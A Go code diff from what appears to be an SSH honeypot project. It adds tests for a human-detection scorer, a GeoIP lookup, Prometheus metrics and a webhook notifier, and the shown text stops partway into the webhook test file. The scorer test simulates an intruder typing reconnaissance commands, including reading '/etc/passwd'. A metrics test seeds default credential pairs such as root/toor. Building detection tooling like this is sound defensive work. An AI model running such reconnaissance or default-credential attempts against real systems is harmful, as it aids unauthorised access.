func TestScorer_HumanLikeInput(t *testing.T) {
|
||||||
|
// Simulate a human: variable timing, backspaces, diverse commands.
|
||||||
|
s := NewScorer()
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
type cmd struct {
|
||||||
|
text string
|
||||||
|
delay time.Duration // base delay between keys
|
||||||
|
}
|
||||||
|
|
||||||
|
commands := []cmd{
|
||||||
|
{"ls -la\r", 80 * time.Millisecond},
|
||||||
|
{"cat /etc/paswd", 120 * time.Millisecond}, // typo
|
||||||
|
{string([]byte{0x7f}), 200 * time.Millisecond}, // backspace
|
||||||
|
{"wd\r", 90 * time.Millisecond}, // correction
|
||||||
|
{"whoami\r", 100 * time.Millisecond},
|
||||||
|
{"uname -a\r", 150 * time.Millisecond},
|
||||||
|
{string([]byte{0x09}), 300 * time.Millisecond}, // tab completion
|
||||||
|
{"pwd\r", 70 * time.Millisecond},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, c := range commands {
|
||||||
|
for _, b := range []byte(c.text) {
|
||||||
|
// Add ±30% jitter to make timing more natural.
|
||||||
|
jitter := time.Duration(float64(c.delay) * 0.3)
|
||||||
|
delay := c.delay + jitter // simplified: always add, still variable across commands
|
||||||
|
s.RecordEvent(now, DirInput, []byte{b})
|
||||||
|
now = now.Add(delay)
|
||||||
|
}
|
||||||
|
// Pause between commands (thinking time).
|
||||||
|
now = now.Add(2 * time.Second)
|
||||||
|
}
|
||||||
|
|
||||||
|
score := s.Score()
|
||||||
|
if score <= 0.6 {
|
||||||
|
t.Errorf("human-like input: got %f, want > 0.6", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScorer_OutputIgnored(t *testing.T) {
|
||||||
|
s := NewScorer()
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
// Only output events — should not affect score.
|
||||||
|
for range 100 {
|
||||||
|
s.RecordEvent(now, DirOutput, []byte("some output\n"))
|
||||||
|
now = now.Add(10 * time.Millisecond)
|
||||||
|
}
|
||||||
|
|
||||||
|
score := s.Score()
|
||||||
|
if score != 0 {
|
||||||
|
t.Errorf("output-only: got %f, want 0", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScorer_ThreadSafety(t *testing.T) {
|
||||||
|
s := NewScorer()
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
var wg sync.WaitGroup
|
||||||
|
for i := range 10 {
|
||||||
|
wg.Go(func() {
|
||||||
|
for j := range 100 {
|
||||||
|
ts := now.Add(time.Duration(i*100+j) * time.Millisecond)
|
||||||
|
s.RecordEvent(ts, DirInput, []byte("a"))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Concurrently read score.
|
||||||
|
wg.Go(func() {
|
||||||
|
for range 50 {
|
||||||
|
_ = s.Score()
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
wg.Wait()
|
||||||
|
|
||||||
|
// Should not panic; score should be valid.
|
||||||
|
score := s.Score()
|
||||||
|
if score < 0 || score > 1 {
|
||||||
|
t.Errorf("concurrent score out of range: %f", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestScorer_CommandDiversity(t *testing.T) {
|
||||||
|
s := NewScorer()
|
||||||
|
now := time.Now()
|
||||||
|
|
||||||
|
// Type 4 different commands with human-ish timing.
|
||||||
|
cmds := []string{"ls\r", "pwd\r", "id\r", "whoami\r"}
|
||||||
|
for _, cmd := range cmds {
|
||||||
|
for _, b := range []byte(cmd) {
|
||||||
|
s.RecordEvent(now, DirInput, []byte{b})
|
||||||
|
now = now.Add(100 * time.Millisecond)
|
||||||
|
}
|
||||||
|
now = now.Add(time.Second)
|
||||||
|
}
|
||||||
|
|
||||||
|
score := s.Score()
|
||||||
|
// With 4 unique commands, human timing, and decent duration,
|
||||||
|
// we should get a meaningful score.
|
||||||
|
if score < 0.4 {
|
||||||
|
t.Errorf("diverse commands: got %f, want >= 0.4", score)
|
||||||
|
}
|
||||||
|
}
|
||||||
51
internal/geoip/geoip.go
Normal file
51
internal/geoip/geoip.go
Normal file
@@ -0,0 +1,51 @@
|
|||||||
|
package geoip
|
||||||
|
|
||||||
|
import (
|
||||||
|
_ "embed"
|
||||||
|
"net"
|
||||||
|
|
||||||
|
"github.com/oschwald/maxminddb-golang"
|
||||||
|
)
|
||||||
|
|
||||||
|
//go:embed dbip-country-lite.mmdb
|
||||||
|
var mmdbData []byte
|
||||||
|
|
||||||
|
// Reader provides country-level GeoIP lookups using an embedded DB-IP Lite database.
|
||||||
|
type Reader struct {
|
||||||
|
db *maxminddb.Reader
|
||||||
|
}
|
||||||
|
|
||||||
|
// New opens the embedded MMDB and returns a ready-to-use Reader.
|
||||||
|
func New() (*Reader, error) {
|
||||||
|
db, err := maxminddb.FromBytes(mmdbData)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
return &Reader{db: db}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
type countryRecord struct {
|
||||||
|
Country struct {
|
||||||
|
ISOCode string `maxminddb:"iso_code"`
|
||||||
|
} `maxminddb:"country"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// Lookup returns the ISO 3166-1 alpha-2 country code for the given IP address,
|
||||||
|
// or an empty string if the lookup fails or no result is found.
|
||||||
|
func (r *Reader) Lookup(ipStr string) string {
|
||||||
|
ip := net.ParseIP(ipStr)
|
||||||
|
if ip == nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
|
||||||
|
var record countryRecord
|
||||||
|
if err := r.db.Lookup(ip, &record); err != nil {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
return record.Country.ISOCode
|
||||||
|
}
|
||||||
|
|
||||||
|
// Close releases resources held by the reader.
|
||||||
|
func (r *Reader) Close() error {
|
||||||
|
return r.db.Close()
|
||||||
|
}
|
||||||
44
internal/geoip/geoip_test.go
Normal file
44
internal/geoip/geoip_test.go
Normal file
@@ -0,0 +1,44 @@
|
|||||||
|
package geoip
|
||||||
|
|
||||||
|
import "testing"
|
||||||
|
|
||||||
|
func TestLookup(t *testing.T) {
|
||||||
|
reader, err := New()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("New: %v", err)
|
||||||
|
}
|
||||||
|
defer reader.Close()
|
||||||
|
|
||||||
|
tests := []struct {
|
||||||
|
ip string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"8.8.8.8", "US"},
|
||||||
|
{"1.1.1.1", "AU"},
|
||||||
|
{"invalid", ""},
|
||||||
|
{"", ""},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
t.Run(tt.ip, func(t *testing.T) {
|
||||||
|
got := reader.Lookup(tt.ip)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("Lookup(%q) = %q, want %q", tt.ip, got, tt.want)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLookupPrivateIP(t *testing.T) {
|
||||||
|
reader, err := New()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("New: %v", err)
|
||||||
|
}
|
||||||
|
defer reader.Close()
|
||||||
|
|
||||||
|
// Private IPs should return empty string (no country).
|
||||||
|
got := reader.Lookup("10.0.0.1")
|
||||||
|
if got != "" {
|
||||||
|
t.Errorf("Lookup(10.0.0.1) = %q, want empty", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
178
internal/metrics/metrics.go
Normal file
178
internal/metrics/metrics.go
Normal file
@@ -0,0 +1,178 @@
|
|||||||
|
package metrics
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"net/http"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
"github.com/prometheus/client_golang/prometheus"
|
||||||
|
"github.com/prometheus/client_golang/prometheus/collectors"
|
||||||
|
"github.com/prometheus/client_golang/prometheus/promhttp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Metrics holds all Prometheus collectors for the honeypot.
|
||||||
|
type Metrics struct {
|
||||||
|
registry *prometheus.Registry
|
||||||
|
|
||||||
|
SSHConnectionsTotal *prometheus.CounterVec
|
||||||
|
SSHConnectionsActive prometheus.Gauge
|
||||||
|
AuthAttemptsTotal *prometheus.CounterVec
|
||||||
|
AuthAttemptsByCountry *prometheus.CounterVec
|
||||||
|
CommandsExecuted *prometheus.CounterVec
|
||||||
|
HumanScore prometheus.Histogram
|
||||||
|
SessionsTotal *prometheus.CounterVec
|
||||||
|
SessionsActive prometheus.Gauge
|
||||||
|
SessionDuration prometheus.Histogram
|
||||||
|
ExecCommandsTotal prometheus.Counter
|
||||||
|
BuildInfo *prometheus.GaugeVec
|
||||||
|
StorageQueryDuration *prometheus.HistogramVec
|
||||||
|
StorageQueryErrors *prometheus.CounterVec
|
||||||
|
}
|
||||||
|
|
||||||
|
// New creates a new Metrics instance with all collectors registered.
|
||||||
|
func New(version string) *Metrics {
|
||||||
|
reg := prometheus.NewRegistry()
|
||||||
|
|
||||||
|
m := &Metrics{
|
||||||
|
registry: reg,
|
||||||
|
SSHConnectionsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_ssh_connections_total",
|
||||||
|
Help: "Total SSH connections received.",
|
||||||
|
}, []string{"outcome"}),
|
||||||
|
SSHConnectionsActive: prometheus.NewGauge(prometheus.GaugeOpts{
|
||||||
|
Name: "oubliette_ssh_connections_active",
|
||||||
|
Help: "Current active SSH connections.",
|
||||||
|
}),
|
||||||
|
AuthAttemptsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_auth_attempts_total",
|
||||||
|
Help: "Total authentication attempts.",
|
||||||
|
}, []string{"result", "reason"}),
|
||||||
|
AuthAttemptsByCountry: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_auth_attempts_by_country_total",
|
||||||
|
Help: "Total authentication attempts by country.",
|
||||||
|
}, []string{"country"}),
|
||||||
|
CommandsExecuted: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_commands_executed_total",
|
||||||
|
Help: "Total commands executed in shells.",
|
||||||
|
}, []string{"shell"}),
|
||||||
|
HumanScore: prometheus.NewHistogram(prometheus.HistogramOpts{
|
||||||
|
Name: "oubliette_human_score",
|
||||||
|
Help: "Distribution of final human detection scores.",
|
||||||
|
Buckets: prometheus.LinearBuckets(0, 0.1, 11), // 0.0, 0.1, ..., 1.0
|
||||||
|
}),
|
||||||
|
SessionsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_sessions_total",
|
||||||
|
Help: "Total sessions created.",
|
||||||
|
}, []string{"shell"}),
|
||||||
|
SessionsActive: prometheus.NewGauge(prometheus.GaugeOpts{
|
||||||
|
Name: "oubliette_sessions_active",
|
||||||
|
Help: "Current active sessions.",
|
||||||
|
}),
|
||||||
|
SessionDuration: prometheus.NewHistogram(prometheus.HistogramOpts{
|
||||||
|
Name: "oubliette_session_duration_seconds",
|
||||||
|
Help: "Session duration in seconds.",
|
||||||
|
Buckets: []float64{1, 5, 10, 30, 60, 120, 300, 600, 1800, 3600},
|
||||||
|
}),
|
||||||
|
ExecCommandsTotal: prometheus.NewCounter(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_exec_commands_total",
|
||||||
|
Help: "Total SSH exec commands received.",
|
||||||
|
}),
|
||||||
|
BuildInfo: prometheus.NewGaugeVec(prometheus.GaugeOpts{
|
||||||
|
Name: "oubliette_build_info",
|
||||||
|
Help: "Build information. Always 1.",
|
||||||
|
}, []string{"version"}),
|
||||||
|
StorageQueryDuration: prometheus.NewHistogramVec(prometheus.HistogramOpts{
|
||||||
|
Name: "oubliette_storage_query_duration_seconds",
|
||||||
|
Help: "Duration of storage query calls in seconds.",
|
||||||
|
Buckets: []float64{0.001, 0.005, 0.01, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10},
|
||||||
|
}, []string{"method"}),
|
||||||
|
StorageQueryErrors: prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "oubliette_storage_query_errors_total",
|
||||||
|
Help: "Total storage query errors.",
|
||||||
|
}, []string{"method"}),
|
||||||
|
}
|
||||||
|
|
||||||
|
reg.MustRegister(
|
||||||
|
collectors.NewGoCollector(),
|
||||||
|
collectors.NewProcessCollector(collectors.ProcessCollectorOpts{}),
|
||||||
|
m.SSHConnectionsTotal,
|
||||||
|
m.SSHConnectionsActive,
|
||||||
|
m.AuthAttemptsTotal,
|
||||||
|
m.AuthAttemptsByCountry,
|
||||||
|
m.CommandsExecuted,
|
||||||
|
m.HumanScore,
|
||||||
|
m.SessionsTotal,
|
||||||
|
m.SessionsActive,
|
||||||
|
m.SessionDuration,
|
||||||
|
m.ExecCommandsTotal,
|
||||||
|
m.BuildInfo,
|
||||||
|
m.StorageQueryDuration,
|
||||||
|
m.StorageQueryErrors,
|
||||||
|
)
|
||||||
|
|
||||||
|
m.BuildInfo.WithLabelValues(version).Set(1)
|
||||||
|
|
||||||
|
// Initialize label combinations so they appear in Gather/output.
|
||||||
|
for _, outcome := range []string{"accepted", "rejected_handshake", "rejected_max_connections"} {
|
||||||
|
m.SSHConnectionsTotal.WithLabelValues(outcome)
|
||||||
|
}
|
||||||
|
for _, reason := range []string{"static_credential", "remembered_credential", "threshold_reached", "rejected"} {
|
||||||
|
m.AuthAttemptsTotal.WithLabelValues("accepted", reason)
|
||||||
|
m.AuthAttemptsTotal.WithLabelValues("rejected", reason)
|
||||||
|
}
|
||||||
|
for _, sh := range []string{"bash", "fridge", "banking", "adventure", "cisco"} {
|
||||||
|
m.SessionsTotal.WithLabelValues(sh)
|
||||||
|
m.CommandsExecuted.WithLabelValues(sh)
|
||||||
|
}
|
||||||
|
|
||||||
|
return m
|
||||||
|
}
|
||||||
|
|
||||||
|
// RegisterStoreCollector registers a collector that queries storage stats on each scrape.
|
||||||
|
func (m *Metrics) RegisterStoreCollector(store storage.Store) {
|
||||||
|
m.registry.MustRegister(&storeCollector{store: store})
|
||||||
|
}
|
||||||
|
|
||||||
|
// Handler returns an http.Handler that serves Prometheus metrics.
|
||||||
|
func (m *Metrics) Handler() http.Handler {
|
||||||
|
return promhttp.HandlerFor(m.registry, promhttp.HandlerOpts{})
|
||||||
|
}
|
||||||
|
|
||||||
|
// storeCollector implements prometheus.Collector, querying storage on each scrape.
|
||||||
|
type storeCollector struct {
|
||||||
|
store storage.Store
|
||||||
|
}
|
||||||
|
|
||||||
|
var (
|
||||||
|
storageLoginAttemptsDesc = prometheus.NewDesc(
|
||||||
|
"oubliette_storage_login_attempts_total",
|
||||||
|
"Total login attempts in storage.",
|
||||||
|
nil, nil,
|
||||||
|
)
|
||||||
|
storageUniqueIPsDesc = prometheus.NewDesc(
|
||||||
|
"oubliette_storage_unique_ips",
|
||||||
|
"Unique IPs in storage.",
|
||||||
|
nil, nil,
|
||||||
|
)
|
||||||
|
storageSessionsDesc = prometheus.NewDesc(
|
||||||
|
"oubliette_storage_sessions_total",
|
||||||
|
"Total sessions in storage.",
|
||||||
|
nil, nil,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
|
func (c *storeCollector) Describe(ch chan<- *prometheus.Desc) {
|
||||||
|
ch <- storageLoginAttemptsDesc
|
||||||
|
ch <- storageUniqueIPsDesc
|
||||||
|
ch <- storageSessionsDesc
|
||||||
|
}
|
||||||
|
|
||||||
|
func (c *storeCollector) Collect(ch chan<- prometheus.Metric) {
|
||||||
|
stats, err := c.store.GetDashboardStats(context.Background())
|
||||||
|
if err != nil {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
ch <- prometheus.MustNewConstMetric(storageLoginAttemptsDesc, prometheus.GaugeValue, float64(stats.TotalAttempts))
|
||||||
|
ch <- prometheus.MustNewConstMetric(storageUniqueIPsDesc, prometheus.GaugeValue, float64(stats.UniqueIPs))
|
||||||
|
ch <- prometheus.MustNewConstMetric(storageSessionsDesc, prometheus.GaugeValue, float64(stats.TotalSessions))
|
||||||
|
}
|
||||||
142
internal/metrics/metrics_test.go
Normal file
142
internal/metrics/metrics_test.go
Normal file
@@ -0,0 +1,142 @@
|
|||||||
|
package metrics
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"net/http/httptest"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestNew(t *testing.T) {
|
||||||
|
m := New("1.2.3")
|
||||||
|
|
||||||
|
// Gather all metrics and check expected names exist.
|
||||||
|
families, err := m.registry.Gather()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("gather: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
want := map[string]bool{
|
||||||
|
"oubliette_ssh_connections_total": false,
|
||||||
|
"oubliette_ssh_connections_active": false,
|
||||||
|
"oubliette_auth_attempts_total": false,
|
||||||
|
"oubliette_commands_executed_total": false,
|
||||||
|
"oubliette_human_score": false,
|
||||||
|
"oubliette_sessions_total": false,
|
||||||
|
"oubliette_sessions_active": false,
|
||||||
|
"oubliette_session_duration_seconds": false,
|
||||||
|
"oubliette_build_info": false,
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, f := range families {
|
||||||
|
if _, ok := want[f.GetName()]; ok {
|
||||||
|
want[f.GetName()] = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for name, found := range want {
|
||||||
|
if !found {
|
||||||
|
t.Errorf("metric %q not registered", name)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestAuthAttemptsByCountry(t *testing.T) {
|
||||||
|
m := New("1.0.0")
|
||||||
|
m.AuthAttemptsByCountry.WithLabelValues("US").Inc()
|
||||||
|
m.AuthAttemptsByCountry.WithLabelValues("DE").Inc()
|
||||||
|
m.AuthAttemptsByCountry.WithLabelValues("US").Inc()
|
||||||
|
|
||||||
|
families, err := m.registry.Gather()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("gather: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
var found bool
|
||||||
|
for _, f := range families {
|
||||||
|
if f.GetName() == "oubliette_auth_attempts_by_country_total" {
|
||||||
|
found = true
|
||||||
|
if len(f.GetMetric()) != 2 {
|
||||||
|
t.Errorf("expected 2 label pairs (US, DE), got %d", len(f.GetMetric()))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !found {
|
||||||
|
t.Error("oubliette_auth_attempts_by_country_total not found after incrementing")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHandler(t *testing.T) {
|
||||||
|
m := New("1.2.3")
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/metrics", nil)
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
m.Handler().ServeHTTP(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200", w.Code)
|
||||||
|
}
|
||||||
|
|
||||||
|
body, err := io.ReadAll(w.Body)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("reading body: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if !strings.Contains(string(body), `oubliette_build_info{version="1.2.3"} 1`) {
|
||||||
|
t.Errorf("response should contain build_info metric, got:\n%s", body)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestStoreCollector(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Seed some data.
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
|
||||||
|
t.Fatalf("RecordLoginAttempt: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.2", ""); err != nil {
|
||||||
|
t.Fatalf("RecordLoginAttempt: %v", err)
|
||||||
|
}
|
||||||
|
if _, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", ""); err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
m := New("test")
|
||||||
|
m.RegisterStoreCollector(store)
|
||||||
|
|
||||||
|
families, err := m.registry.Gather()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("gather: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
wantMetrics := map[string]float64{
|
||||||
|
"oubliette_storage_login_attempts_total": 2,
|
||||||
|
"oubliette_storage_unique_ips": 2,
|
||||||
|
"oubliette_storage_sessions_total": 1,
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, f := range families {
|
||||||
|
expected, ok := wantMetrics[f.GetName()]
|
||||||
|
if !ok {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if len(f.GetMetric()) == 0 {
|
||||||
|
t.Errorf("metric %q has no samples", f.GetName())
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
got := f.GetMetric()[0].GetGauge().GetValue()
|
||||||
|
if got != expected {
|
||||||
|
t.Errorf("metric %q = %f, want %f", f.GetName(), got, expected)
|
||||||
|
}
|
||||||
|
delete(wantMetrics, f.GetName())
|
||||||
|
}
|
||||||
|
|
||||||
|
for name := range wantMetrics {
|
||||||
|
t.Errorf("metric %q not found in gather output", name)
|
||||||
|
}
|
||||||
|
}
|
||||||
175
internal/notify/webhook.go
Normal file
175
internal/notify/webhook.go
Normal file
@@ -0,0 +1,175 @@
|
|||||||
|
package notify
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"log/slog"
|
||||||
|
"net/http"
|
||||||
|
"slices"
|
||||||
|
"sync"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Event types.
|
||||||
|
const (
|
||||||
|
EventHumanDetected = "human_detected"
|
||||||
|
EventSessionStarted = "session_started"
|
||||||
|
)
|
||||||
|
|
||||||
|
// SessionInfo holds session data included in webhook payloads.
|
||||||
|
type SessionInfo struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
IP string `json:"ip"`
|
||||||
|
Username string `json:"username"`
|
||||||
|
ShellName string `json:"shell_name"`
|
||||||
|
HumanScore float64 `json:"human_score"`
|
||||||
|
ConnectedAt string `json:"connected_at"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// webhookPayload is the JSON body sent to webhooks.
|
||||||
|
type webhookPayload struct {
|
||||||
|
Event string `json:"event"`
|
||||||
|
Timestamp string `json:"timestamp"`
|
||||||
|
Session SessionInfo `json:"session"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// Notifier sends webhook notifications for honeypot events.
|
||||||
|
type Notifier struct {
|
||||||
|
webhooks []config.WebhookNotifyConfig
|
||||||
|
logger *slog.Logger
|
||||||
|
client *http.Client
|
||||||
|
|
||||||
|
mu sync.Mutex
|
||||||
|
sent map[string]struct{} // dedup key: "sessionID:eventType"
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewNotifier creates a Notifier with the given webhook configurations.
|
||||||
|
func NewNotifier(webhooks []config.WebhookNotifyConfig, logger *slog.Logger) *Notifier {
|
||||||
|
return &Notifier{
|
||||||
|
webhooks: webhooks,
|
||||||
|
logger: logger,
|
||||||
|
client: &http.Client{Timeout: 10 * time.Second},
|
||||||
|
sent: make(map[string]struct{}),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Notify sends a notification for the given event type and session.
|
||||||
|
// Deduplicates by (sessionID, eventType) — each combination is sent at most once.
|
||||||
|
func (n *Notifier) Notify(ctx context.Context, eventType string, session SessionInfo) {
|
||||||
|
dedupKey := session.ID + ":" + eventType
|
||||||
|
|
||||||
|
n.mu.Lock()
|
||||||
|
if _, ok := n.sent[dedupKey]; ok {
|
||||||
|
n.mu.Unlock()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
n.sent[dedupKey] = struct{}{}
|
||||||
|
n.mu.Unlock()
|
||||||
|
|
||||||
|
payload := webhookPayload{
|
||||||
|
Event: eventType,
|
||||||
|
Timestamp: time.Now().UTC().Format(time.RFC3339),
|
||||||
|
Session: session,
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, wh := range n.webhooks {
|
||||||
|
if !n.shouldSend(wh, eventType) {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
go n.send(ctx, wh, payload)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// CleanupSession removes dedup state for a session.
|
||||||
|
func (n *Notifier) CleanupSession(sessionID string) {
|
||||||
|
n.mu.Lock()
|
||||||
|
defer n.mu.Unlock()
|
||||||
|
for key := range n.sent {
|
||||||
|
if len(key) > len(sessionID) && key[:len(sessionID)+1] == sessionID+":" {
|
||||||
|
delete(n.sent, key)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// shouldSend returns true if the webhook is configured to receive this event type.
|
||||||
|
func (n *Notifier) shouldSend(wh config.WebhookNotifyConfig, eventType string) bool {
|
||||||
|
if len(wh.Events) == 0 {
|
||||||
|
return true // empty = all events
|
||||||
|
}
|
||||||
|
return slices.Contains(wh.Events, eventType)
|
||||||
|
}
|
||||||
|
|
||||||
|
func (n *Notifier) send(ctx context.Context, wh config.WebhookNotifyConfig, payload webhookPayload) {
|
||||||
|
body, err := json.Marshal(payload)
|
||||||
|
if err != nil {
|
||||||
|
n.logger.Error("failed to marshal webhook payload", "err", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
req, err := http.NewRequestWithContext(ctx, http.MethodPost, wh.URL, bytes.NewReader(body))
|
||||||
|
if err != nil {
|
||||||
|
n.logger.Error("failed to create webhook request", "err", err, "url", wh.URL)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
req.Header.Set("Content-Type", "application/json")
|
||||||
|
for k, v := range wh.Headers {
|
||||||
|
req.Header.Set(k, v)
|
||||||
|
}
|
||||||
|
|
||||||
|
resp, err := n.client.Do(req)
|
||||||
|
if err != nil {
|
||||||
|
n.logger.Error("webhook request failed", "err", err, "url", wh.URL)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer func() { _ = resp.Body.Close() }()
|
||||||
|
|
||||||
|
if resp.StatusCode >= 400 {
|
||||||
|
n.logger.Warn("webhook returned error status",
|
||||||
|
"url", wh.URL,
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"event", payload.Event,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
n.logger.Debug("webhook sent",
|
||||||
|
"url", wh.URL,
|
||||||
|
"event", payload.Event,
|
||||||
|
"session_id", payload.Session.ID,
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
// FormatConnectedAt formats a time for use in SessionInfo.
|
||||||
|
func FormatConnectedAt(t time.Time) string {
|
||||||
|
return t.UTC().Format(time.RFC3339)
|
||||||
|
}
|
||||||
|
|
||||||
|
// NoopNotifier is a no-op notifier used when no webhooks are configured.
|
||||||
|
type NoopNotifier struct{}
|
||||||
|
|
||||||
|
func (NoopNotifier) Notify(context.Context, string, SessionInfo) {}
|
||||||
|
func (NoopNotifier) CleanupSession(string) {}
|
||||||
|
|
||||||
|
// Sender is the interface for sending notifications.
|
||||||
|
type Sender interface {
|
||||||
|
Notify(ctx context.Context, eventType string, session SessionInfo)
|
||||||
|
CleanupSession(sessionID string)
|
||||||
|
}
|
||||||
|
|
||||||
|
var (
|
||||||
|
_ Sender = (*Notifier)(nil)
|
||||||
|
_ Sender = NoopNotifier{}
|
||||||
|
)
|
||||||
|
|
||||||
|
// NewSender creates a Sender from configuration. Returns a NoopNotifier
|
||||||
|
// if no webhooks are configured.
|
||||||
|
func NewSender(webhooks []config.WebhookNotifyConfig, logger *slog.Logger) Sender {
|
||||||
|
if len(webhooks) == 0 {
|
||||||
|
return NoopNotifier{}
|
||||||
|
}
|
||||||
|
return NewNotifier(webhooks, logger)
|
||||||
|
}
|
||||||
243
internal/notify/webhook_test.go
Normal file
243
internal/notify/webhook_test.go
Normal file
@@ -0,0 +1,243 @@
|
|||||||
|
package notify
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/json"
|
||||||
|
"log/slog"
|
||||||
|
"net/http"
|
||||||
|
"net/http/httptest"
|
||||||
|
"sync"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/config"
|
||||||
|
)
|
||||||
|
|
||||||
|
func testSession() SessionInfo {
|
||||||
|
return SessionInfo{
|
||||||
|
ID: "test-session-123",
|
||||||
|
IP: "1.2.3.4",
|
||||||
|
Username: "root",
|
||||||
|
ShellName: "bash",
|
||||||
|
HumanScore: 0.85,
|
||||||
|
ConnectedAt: FormatConnectedAt(time.Now()),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNotifier_PayloadStructure(t *testing.T) {
|
||||||
|
var received webhookPayload
|
||||||
|
var mu sync.Mutex
|
||||||
|
done := make(chan struct{})
|
||||||
|
|
||||||
|
srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
mu.Lock()
|
||||||
|
defer mu.Unlock()
|
||||||
|
if err := json.NewDecoder(r.Body).Decode(&received); err != nil {
|
||||||
|
